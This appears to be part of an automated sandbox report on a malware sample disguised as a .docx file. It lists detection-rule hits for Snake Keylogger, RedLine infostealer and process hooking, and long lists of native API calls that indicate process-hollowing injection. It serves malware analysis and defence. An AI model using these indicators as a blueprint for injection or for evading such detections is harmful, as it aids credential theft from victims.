          Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000002.3435325759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000D.00000001.2421840333.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000009.00000001.2342337171.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000D.00000002.3435459349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8254 NtReadVirtualMemory,0_2_029D8254
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D84C4 NtUnmapViewOfSection,0_2_029D84C4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_029DDACC
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_029DDA44
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_029DDBB0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D8BB0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D79B4 NtAllocateVirtualMemory,0_2_029D79B4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D7D00 NtWriteVirtualMemory,0_2_029D7D00
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D8BAE
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D79B2 NtAllocateVirtualMemory,0_2_029D79B2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DD9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_029DD9F0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_02958254 NtReadVirtualMemory,6_2_02958254
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_029584C4 NtUnmapViewOfSection,6_2_029584C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0295DACC NtCreateFile,NtWriteFile,NtClose,6_2_0295DACC
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0295DA44 NtDeleteFile,6_2_0295DA44
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_02958BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02958BB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0295DBB0 NtOpenFile,NtReadFile,NtClose,6_2_0295DBB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_029579B4 NtAllocateVirtualMemory,6_2_029579B4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_02957D00 NtWriteVirtualMemory,6_2_02957D00
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_02958BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02958BAE
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_029579B2 NtAllocateVirtualMemory,6_2_029579B2
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0295D9F0 NtDeleteFile,6_2_0295D9F0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE8254 NtReadVirtualMemory,10_2_02AE8254
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE84C4 NtUnmapViewOfSection,10_2_02AE84C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AEDACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,10_2_02AEDACC
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AEDA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02AEDA44
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02AE8BB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AEDBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,10_2_02AEDBB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE79B4 NtAllocateVirtualMemory,10_2_02AE79B4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE7D00 NtWriteVirtualMemory,10_2_02AE7D00
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02AE8BAE
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AE79B2 NtAllocateVirtualMemory,10_2_02AE79B2
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AED9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02AED9F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D85DC CreateProcessAsUserW,0_2_029D85DC
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C20C40_2_029C20C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00408C604_2_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0040DC114_2_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00407C3F4_2_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00418CCC4_2_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00406CA04_2_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004028B04_2_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0041A4BE4_2_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004182444_2_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004016504_2_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00402F204_2_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004193C44_2_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004187884_2_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00402F894_2_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00402B904_2_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004073A04_2_004073A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1CF015C04_2_1CF015C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1CF015B14_2_1CF015B1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1CF013204_2_1CF01320
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1CF013114_2_1CF01311
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6EE6604_2_1F6EE660
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6E0A604_2_1F6E0A60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6E0A504_2_1F6E0A50
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6EC0F04_2_1F6EC0F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6E7C984_2_1F6E7C98
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8F8884_2_20A8F888
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8C4804_2_20A8C480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8ECF84_2_20A8ECF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8B8F04_2_20A8B8F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A82C084_2_20A82C08
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8D0104_2_20A8D010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A800404_2_20A80040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8D5D84_2_20A8D5D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8A1D04_2_20A8A1D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A871384_2_20A87138
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8E1684_2_20A8E168
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8AD604_2_20A8AD60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8BEB84_2_20A8BEB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8F2C04_2_20A8F2C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A806084_2_20A80608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8CA484_2_20A8CA48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8DBA04_2_20A8DBA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8A7984_2_20A8A798
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8B3284_2_20A8B328
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A8E7304_2_20A8E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A800064_2_20A80006
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A805F74_2_20A805F7
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A867804_2_20A86780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A82BF94_2_20A82BF9
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20A867714_2_20A86771
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA82A04_2_20AA82A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AABCA04_2_20AABCA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA62B04_2_20AA62B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA54804_2_20AA5480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAD2804_2_20AAD280
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA7CD84_2_20AA7CD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAB6D84_2_20AAB6D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAEE284_2_20AAEE28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA8E304_2_20AA8E30
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA06084_2_20AA0608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA88684_2_20AA8868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAC2684_2_20AAC268
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA00404_2_20AA0040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAE0584_2_20AAE058
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA9FB84_2_20AA9FB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAA5804_2_20AAA580
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA11984_2_20AA1198
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA99E84_2_20AA99E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA93F84_2_20AA93F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA0BD04_2_20AA0BD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA1D284_2_20AA1D28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA71204_2_20AA7120
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAF5104_2_20AAF510
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAB1104_2_20AAB110
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA77104_2_20AA7710
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA17604_2_20AA1760
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAD9704_2_20AAD970
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAAB484_2_20AAAB48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAE7404_2_20AAE740
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA50204_2_20AA5020
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAEE184_2_20AAEE18
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA50104_2_20AA5010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAD2724_2_20AAD272
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAE0484_2_20AAE048
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA45974_2_20AA4597
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AA0BC04_2_20AA0BC0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAAB394_2_20AAAB39
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAE7304_2_20AAE730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAB1004_2_20AAB100
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAF5014_2_20AAF501
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20AAD9694_2_20AAD969
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA00404_2_20CA0040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA07284_2_20CA0728
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA0E104_2_20CA0E10
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA319C4_2_20CA319C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA91974_2_20CA9197
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA14F84_2_20CA14F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA00214_2_20CA0021
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CAA1594_2_20CAA159
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA07184_2_20CA0718
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA0E004_2_20CA0E00
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA14E84_2_20CA14E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA7CE94_2_20CA7CE9
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20CA7CF84_2_20CA7CF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20D9A5B84_2_20D9A5B8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20D9B8684_2_20D9B868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_20D950144_2_20D95014
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00408C604_1_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0040DC114_1_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00407C3F4_1_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00418CCC4_1_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00406CA04_1_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004028B04_1_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0041A4BE4_1_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004182444_1_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004016504_1_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402F204_1_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004193C44_1_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004187884_1_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402F894_1_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402B904_1_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004073A04_1_004073A0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_029420C46_2_029420C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0294D59B6_2_0294D59B
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00408C609_2_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0040DC119_2_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00407C3F9_2_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00418CCC9_2_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00406CA09_2_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004028B09_2_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0041A4BE9_2_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004182449_2_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004016509_2_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402F209_2_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004193C49_2_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004187889_2_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402F899_2_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402B909_2_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004073A09_2_004073A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F15B19_2_340F15B1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F15C09_2_340F15C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F13119_2_340F1311
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F13209_2_340F1320
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371EE6609_2_371EE660
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E7C989_2_371E7C98
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E0A509_2_371E0A50
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E0A609_2_371E0A60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371EC0F09_2_371EC0F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2DBA09_2_37E2DBA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2A7989_2_37E2A798
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2B3289_2_37E2B328
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2E7309_2_37E2E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2F2C09_2_37E2F2C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2BEB89_2_37E2BEB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2CA489_2_37E2CA48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E206089_2_37E20608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2A1D09_2_37E2A1D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D5D89_2_37E2D5D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2AD609_2_37E2AD60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2E1689_2_37E2E168
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E271389_2_37E27138
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2B8F09_2_37E2B8F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2ECF89_2_37E2ECF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2C4809_2_37E2C480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2F8889_2_37E2F888
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E200409_2_37E20040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E22C089_2_37E22C08
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D0109_2_37E2D010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E267809_2_37E26780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E267719_2_37E26771
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E205FD9_2_37E205FD
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D5C89_2_37E2D5C8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D0019_2_37E2D001
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E499E89_2_37E499E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E493F89_2_37E493F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E40BD09_2_37E40BD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E49FB89_2_37E49FB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4A5809_2_37E4A580
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E411989_2_37E41198
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E417609_2_37E41760
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D9709_2_37E4D970
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E7409_2_37E4E740
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4AB489_2_37E4AB48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E471209_2_37E47120
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E41D289_2_37E41D28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4F5109_2_37E4F510
